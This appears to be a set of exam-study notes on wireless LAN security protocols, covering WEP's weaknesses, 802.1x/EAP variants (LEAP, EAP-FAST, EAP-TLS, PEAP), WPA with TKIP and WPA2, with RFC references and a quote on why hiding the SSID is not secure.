Wired Equivalent Privacy (WEP)
Wired Equivalent Privacy (WEP) was the first implementation of wireless encryption, it has several weaknesses and should not be used. Weaknesses include:
- Weak encryption that has been broken
- Vulnerable to dictionary attacks
- Client trusts AP allowing for a rogue access point
- Keys must be manually distributed
802.1x Extensible Authentication Protocols (EAP)
EAP was originally developed for wired port access control and was adopted for wireless access control. The pieces for an EAP implementation require a client wireless card and supplicant, authentication server and access point that are all EAP capable. A wireless client can only transmit EAP traffic until it is authenticated, the RADIUS server authenticates the client and the client authenticates the server in a challenge and response. EAP was originally defined in RFC 2284, which was made obsolete by RFC 3748 and defined for wireless LANs in RFC 4017.
- RADIUS authentication server
- Can use multiple encryption algorithms
- Dynamic WEP keys
- Encrypted passwords
- Centralized control
Cisco Lightweight Extensible Authentication Protocol (LEAP)
- Fast and secure roaming
- Single sign-on with various backends, AD, LDAP
- Widely supported; MS, MAC and Linux clients
Extensible Authentication Protocol – Flexible Authentication via Secure Tunneling (EAP-FAST)
- EAP-FAST is nonproprietary, defined in RFC 4851
- Mutual authentication of server and client by using the TLS handshake protocol
- Immune to man in the middle attacks
- Ability to use multiple password authentication backends
- Computationally efficient
- Does not require certificates
EAP-FAST consists of three phases:
- Phase 0 — Client is dynamically provisioned with a Protected Access Credential (PAC) which can also be installed manually, so this phase is considered optional.
- Phase 1 — Server and client use PAC to authenticate each other and establish a secure tunnel.
- Phase 2 — Client sends credentials through tunnel for authentication.
Exensible Authentication Protocol – Transport Layer Security (EAP-TLS)
EAP-TLS was originally defined in RFC 2716 but was redefined by RFC 5216 in March of 2008, TLS enhancements were defined in RFC 4507. Uses public key infrastructure (PKI) meaning that both client and server need a certificate for authentication and the certificates must be issued by a certification authority (CA). Client is the supplicant, authenticator is the AP and the authentication server is the RADIUS server.
EAP-TLS Authentication Process:
- Client associates to AP which restricts traffic to only EAP traffic.
- AP requests identity which it then passes to the RADIUS server.
- Client validates certificate and responds with EAP with it’s own certificate which starts cryptographic negotiations.
- After the RADIUS server validates the client certificate it responds with the cryptographic specifications for the session.
Protected EAP (PEAP)
PEAP only requires the authentication server to have a certificate.
PEAP has two phases:
- Phase 1 – The client authenticates the server using the CA to verify its certificate and an encrypted TLS tunnel is created with the client.
- Phase 2 – Client is authenticated using industry supported authentication.
PEAP has two authentication implementations:
- Generic Token Card (GTC) (PEAP-GTC ) for client authentication using Novell or LDAP.
- Microsoft Challenge Handshake Authentication Protocol (MS-CHAP) version 2 (PEAP-MSCHAPv2) for MS single sign-on.
WPA with TKIP can now be broken in a minute. It is not recommended for use, however it is still on the test. WPA with TKIP encryption was developed as an interim standard, created to maintain backward compatibility with hardware that had supported WEP. WPA performs authentication using either 802.1x/EAP or with preshared keys prior to the key management phase. WPA uses Temporal Key Integrity Protocol (TKIP) and Message Integrity Check (MIC) and per-packet keying (PPK) in an attempt to make it more secure.
802.11i or WPA2
802.11i is known more commonly as WPA2 and refers to the approved implementation of members of the Wi-Fi Alliance. It provides stronger encryption, AES rather than the weaker RC4 used by WEP and WPA. As a result it commonly required a hardware upgrade.
Keys WPA2 facts from the ONT book:
- Uses 802.1x for authentication
- Uses similar method of key distribution and renewal as WPA
- Supports Proactive Key Caching (PKC)
- Has Intrusion Detection System (IDS)
WPA/WPA2 provide two modes of operation:
- Personal mode — Authentication is performed using PSK
- Enterprise mode — 802.1x/EAP and AAA/Radius server is used for authentication
I will end with this quote, I wish I could find the reference but it is probably from the ONT book:
Some people mistakenly think that if the AP is configured not to broadcast its SSID, they have a secure wireless LAN; that is not true. When a legitimate wireless client with the correct SSID attempts to associate with its AP, the SSID is exchanged over the air unencrypted; that means that an illegitimate user can easily capture and use the SSID.
NetCraftsmen Examining 802.1x and EAP
IEEE 802.1x Standard Document
TLS Deployment Guide
EAP, RFC 2284, RFC 3748
EAP Wireless, RFC 4017
EAP-FAST, RFC 4851
EAP-TLS, RFC 2716, RFC 5216
TLS Enhancements, RFC 4507